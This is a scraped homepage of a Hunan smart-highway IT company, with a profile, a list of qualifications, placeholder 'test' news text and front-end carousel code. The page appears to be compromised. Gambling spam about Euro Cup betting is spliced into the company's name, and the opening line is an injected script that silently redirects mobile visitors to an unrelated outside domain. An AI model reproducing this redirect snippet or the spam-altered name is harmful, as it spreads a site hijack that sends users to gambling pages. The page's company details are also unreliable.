//手机端跳转 if (navigator.userAgent.indexOf("iPhone") > 0 || navigator.userAgent.indexOf("Android") > 0 || navigator.userAgent.indexOf("iPod") > 0) { var patt1 = new RegExp("[0-9]*_[0-9]*"); var url = patt1.exec(location.href); if (url != "") { self.location = "http://gcbrmy.com"; } }

公司简介

湖南欧洲杯竞猜,欧洲杯竞猜官方网站,欧洲杯竞猜官方网站推荐信息技术有限责任公司成立于2000年02月,是一家专注于智慧交通行业信息化整体解决方案的企业,湖南省智能交通、智慧高速领域的骨干企业,湖南省智能交通行业协会会员单位、华东交通大学“智慧交通”战略合作单位。

拥有

20 +

年历程

业务遍及

10+

服务

80+

项公路工程

荣誉资质

建筑业企业资质证书

安全生产许可证

施工劳务资质证书

AAA级信用企业

智慧高速路网运行监测与应急处置系统软件

智慧高速机电系统养护综合管理云平台软件

资讯中心

21
测试测试测试测试测试测试测试测...

测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试测试

if (!window.jQuery) { document.write(unescape("%3Cscript src='/public/static/common/js/jquery.min.js' type='text/javascript'%3E%3C/script%3E")); document.write(unescape("%3Cscript type='text/javascript'%3E try{jQuery.noConflict();}catch(e){} %3C/script%3E")); } if (window.jQuery) { (function($){ default_switch(); //简体繁体互换 function default_switch() { var home_lang = getCookie('home_lang'); if (home_lang == '') { home_lang = 'cn'; } if ($.inArray(home_lang, ['zh','cn'])) { var obj = $('#jquerys2t_1573822909'); var isSimplified = getCookie('jquerys2t_1573822909'); if ('cn' == isSimplified) { $('body').t2s(); $(obj).text('繁體'); } else if ('zh' == isSimplified) { $('body').s2t(); $(obj).text('简体'); } } } //简体繁体互换 $('#jquerys2t_1573822909').click(function(){ var obj = this; var isSimplified = getCookie('jquerys2t_1573822909'); if ('' == isSimplified || 'cn' == isSimplified) { $('body').s2t(); // 简体转繁体 setCookie('jquerys2t_1573822909', 'zh'); $(obj).text('简体'); } else { $('body').t2s(); // 繁体转简体 setCookie('jquerys2t_1573822909', 'cn'); $(obj).text('繁體'); } }); })(jQuery); } /*首页轮播*/ var mySwiper = new Swiper ('.swiper-container', { // direction: 'vertical', // 垂直切换选项 loop: true, // 循环模式选项 autoplay:true,//等同于以下设置 // 如果需要分页器 pagination: { el: '.swiper-pagination', clickable :true, //此参数设置为true时,点击分页器的指示点分页器会控制Swiper切换 }, // 如果需要前进后退按钮 navigation: { nextEl: '.swiper-button-next', prevEl: '.swiper-button-prev', }, // 如果需要滚动条 scrollbar: { el: '.swiper-scrollbar', }, }) //鼠标覆盖停止自动切换 mySwiper.el.onmouseover = function(){ mySwiper.autoplay.stop(); } //鼠标离开开始自动切换 mySwiper.el.onmouseout = function(){ mySwiper.autoplay.start(); } /* 工程案列*/ var mySwiper2 = new Swiper('.swiper-exam', { // autoplay: true,//可选选项,自动滑动 // spaceBetween: 30, slidesPerView : 4, // 窗口展示数量 slidesPerGroup : 1, // 一次经过数量 // 如果需要前进后退按钮 navigation: { nextEl: '.swiper-button-next', prevEl: '.swiper-button-prev', }, //滑到最后一个隐藏前进按钮 on: { slideChangeTransitionEnd: function(){ if(this.isEnd){ this.navigation.$nextEl.css('display','none'); }else{ this.navigation.$nextEl.css('display','block'); } }, }, }); /* 资讯中心*/ var newsiwpers = new Swiper ('.newswiper', { loop: true, // 循环模式选项 slidesPerGroup : 1, // 一次经过数量 slidesPerView : 1, // 窗口展示数量 autoplay:true,//自动轮播 // 如果需要分页器 pagination: { el: '.swiper-pagination', clickable :true, //此参数设置为true时,点击分页器的指示点分页器会控制Swiper切换 // type: 'custom', }, // 如果需要前进后退按钮 navigation: { nextEl: '.swiper-button-next', prevEl: '.swiper-button-prev', }, }) //鼠标覆盖停止自动切换 newsiwpers.el.onmouseover = function(){ newsiwpers.autoplay.stop(); } //鼠标离开开始自动切换 newsiwpers.el.onmouseout = function(){ newsiwpers.autoplay.start(); } $(function(){ $('.certificate .medalgo>img').click(function(){ // 放大图片 let thisImg = $(this).parents('.certificate').find('.medalimg'); thisImg.zoomify('zoom'); }) $('.medalimg').click(function(){ $(this).zoomify('zoom'); }) }) layui.use('form', function(){ var form = layui.form; //监听提交 form.on('submit(formDemo)', function(data){ layer.msg(JSON.stringify(data.field)); return false; }); });